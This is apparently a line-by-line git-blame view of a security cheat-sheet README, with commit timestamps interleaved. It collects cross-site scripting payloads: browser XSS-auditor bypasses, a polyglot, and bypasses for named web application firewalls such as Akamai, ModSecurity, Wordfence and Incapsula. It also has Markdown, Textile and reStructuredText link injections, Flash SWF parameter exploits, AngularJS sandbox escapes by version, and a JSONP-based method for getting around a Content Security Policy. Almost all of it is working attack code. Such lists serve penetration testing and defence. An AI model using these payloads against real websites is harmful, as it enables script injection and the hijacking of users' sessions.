2017-07-14 13:54:44 +00:00
## XSS
2017-08-17 17:19:56 +00:00
**Chrome XSS-Auditor Bypass** by [@vivekchsm ](https://twitter.com/vivekchsm )
2017-07-14 13:54:44 +00:00
```html
< svg > < animate xlink:href = #x attributeName = href values = javascript:alert(1) / > < a id = x > < rect width = 100 height = 100 / > < / a >
```
2017-07-15 19:20:12 +00:00
2017-07-23 21:33:13 +00:00
**Chrome < v60 beta XSS-Auditor Bypass * *
```html
< script src = "data:,alert(1)%250A-- >
```
2017-08-10 13:47:39 +00:00
**Other Chrome XSS-Auditor Bypasses**
2017-08-05 03:33:15 +00:00
```html
< script > a l e r t ( 1 ) < / s c r i p t
```
2017-08-10 13:47:39 +00:00
```html
< script > a l e r t ( 1 ) % 0 d % 0 a - - > % 0 9 < / s c r i p t
```
2017-08-15 18:08:48 +00:00
```html
< x > %00%00%00%00%00%00%00< script > alert ( 1 ) < / script >
```
2017-08-31 16:43:12 +00:00
**Safari XSS Vector** by [@mramydnei ](https://twitter.com/mramydnei/status/902470271327551489 )
```html
< script > location . href ; 'javascript:alert%281%29' < / script >
```
2017-07-15 19:20:12 +00:00
**XSS Polyglot** by [Ahmed Elsobky ](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot )
```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//< /stYle/< /titLe/< /teXtarEa/< /scRipt/--!>\x3csVg/< sVg / oNloAd = alert()// > \x3e
```
2017-07-14 13:54:44 +00:00
**Kona WAF (Akamai) Bypass**
```html
\');confirm(1);//
```
**ModSecurity WAF Bypass**
Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
```html
< img src = x onerror = prompt(document.domain) onerror = prompt(document.domain) onerror = prompt(document.domain) >
```
**Wordfence XSS Bypasses**
```html
< meter onmouseover = "alert(1)"
```
```html
'">>< div > < meter onmouseover = "alert(1)" < / div > "
```
```html
>>< marquee loop = 1 width = 0 onfinish = alert(1) >
```
2017-09-12 15:18:29 +00:00
**Incapsula WAF Bypasses** by [@i_bo0om ](https://twitter.com/i_bo0om )
```html
< iframe / onload = 'this["src"]="javas	cript:al"+"ert``"' ; >
```
```html
< img / src = q onerror = 'new Function`al \ert \`1 \``' >
```
2017-07-14 13:54:44 +00:00
**jQuery < 3.0.0 XSS * *
by [Egor Homakov ](https://github.com/jquery/jquery/issues/2432 )
```js
$.get('http://sakurity.com/jqueryxss')
```
In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
1) Find any cross domain requests to untrusted domains which may inadvertently execute script.
2) Find any requests to trusted API endpoints where script can be injected into data sources.
**URL verification bypasses (works without `	` too)**
```
javas	 cript://www.google.com/%0Aalert(1)
```
**Markdown XSS**
2017-08-16 08:01:27 +00:00
```md
2017-11-19 11:17:46 +00:00
[a ](javascript:confirm(1 ))
2017-08-16 08:01:27 +00:00
```
2017-07-14 13:54:44 +00:00
```md
[a ](javascript://www.google.com%0Aprompt(1 ))
2017-07-16 11:33:34 +00:00
```
2017-10-07 07:50:31 +00:00
```md
[a ](javascript://%0d%0aconfirm(1 ))
```
2017-08-16 08:01:27 +00:00
```md
[a ](javascript://%0d%0aconfirm(1 );com)
```
```md
[a ](javascript:window.onerror=confirm;throw%201 )
```
2017-10-07 07:50:31 +00:00
```md
[a]: (javascript:prompt(1))
```
2017-09-27 18:45:22 +00:00
**Flash SWF XSS**
- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf`
- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&`
2017-09-27 18:57:21 +00:00
- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants)
2017-09-27 18:45:22 +00:00
- FlashMediaElement: < code > flashmediaelement.swf?jsinitfunctio%gn=alert`1`</ code >
2017-10-01 21:04:49 +00:00
- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
2017-09-27 18:45:22 +00:00
2017-09-27 18:48:38 +00:00
- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
2017-09-27 18:45:22 +00:00
- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<`
- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
2017-10-01 09:19:34 +00:00
- AutoDemo: `control.swf?onend=javascript:alert(1)//`
- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
2017-09-27 18:57:21 +00:00
- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
2017-09-27 18:45:22 +00:00
2017-09-27 18:48:38 +00:00
- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
2017-09-27 18:45:22 +00:00
- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
2017-10-18 15:50:27 +00:00
- Uploadify (legacy): `uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf`
2017-09-27 18:45:22 +00:00
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
2017-10-18 15:50:27 +00:00
_Note: Useful reference on constructing Flash-based XSS payloads available at [MWR Labs ](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/ )._
2017-09-27 18:48:38 +00:00
2017-08-16 08:01:27 +00:00
**Lightweight Markup Languages**
**RubyDoc** (.rdoc)
```rdoc
XSS[JavaScript:alert(1)]
```
2017-08-16 08:24:39 +00:00
**Textile** ([.textile](https://txstyle.org/))
2017-08-16 08:01:27 +00:00
```textile
"Test link":javascript:alert(1)
```
2017-08-16 08:24:39 +00:00
**reStructuredText** ([.rst](http://docutils.sourceforge.net/docs/user/rst/quickref.html))
2017-08-16 08:01:27 +00:00
```rst
`Test link` __.
__ javascript:alert(document.domain)
```
2017-08-28 14:36:49 +00:00
**Unicode characters**
```html
2017-10-18 15:50:27 +00:00
†‡•< img src=a onerror=javascript:alert('test')>…‰€
2017-08-28 14:36:49 +00:00
```
2017-07-16 11:46:53 +00:00
**AngularJS Template Injection based XSS**
2017-07-16 11:33:34 +00:00
2017-08-16 08:24:39 +00:00
*For manual verification on a live target, use `angular.version` in your browser console*
2017-08-16 08:22:29 +00:00
2017-07-16 11:33:34 +00:00
**1.0.1 - 1.1.5** by [Mario Heiderich (Cure53) ](https://twitter.com/0x6D6172696F )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{constructor.constructor('alert(1)')()}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.2.0 - 1.2.1** by [Jan Horn (Google) ](https://twitter.com/tehjh )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.2.6 - 1.2.18** by [Jan Horn (Google) ](https://twitter.com/tehjh )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.2.19 - 1.2.23** by [Mathias Karlsson ](https://twitter.com/avlidienbrunn )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.3.0** by [Gábor Molnár (Google) ](https://twitter.com/molnar_g )
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
```
{{!ready & & (ready = true) & & (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) & &
(apply = constructor) & &
(valueOf = call) & &
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.3.19** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.3.20** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger) ](https://twitter.com/garethheyes )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.5.0 - 1.5.8** by [Ian Hickey ](https://twitter.com/ianhickey1024 )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
```
2017-07-16 11:46:53 +00:00
2017-07-16 11:33:34 +00:00
**1.5.9 - 1.5.11** by [Jan Horn (Google) ](https://twitter.com/tehjh )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
```
2017-07-16 11:46:53 +00:00
2017-08-16 08:22:29 +00:00
**1.6.0+** (no [Expression Sandbox ](http://angularjs.blogspot.co.uk/2016/09/angular-16-expression-sandbox-removal.html )) by [Mario Heiderich (Cure53) ](https://twitter.com/0x6D6172696F )
2017-07-16 11:46:53 +00:00
2017-07-16 22:13:15 +00:00
```js
2017-07-16 11:33:34 +00:00
{{constructor.constructor('alert(1)')()}}
```
2017-10-28 17:16:27 +00:00
**Content Security Policy (CSP) bypass via JSONP endpoints**
Grab the target's CSP:
```
curl -I http://example.com | grep 'Content-Security-Policy'
```
Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target's address into the "Content Security Policy" field. The CSP Evaluator will notify you if one of the whitelisted domains has JSONP endpoints.
![image ](https://user-images.githubusercontent.com/18099289/32136707-a1c12510-bc12-11e7-8a80-8a22b3e94232.png )
Now we can use a Google dork to find some JSONP endpoints on the domains listed above.
```
site:example.com inurl:callback
```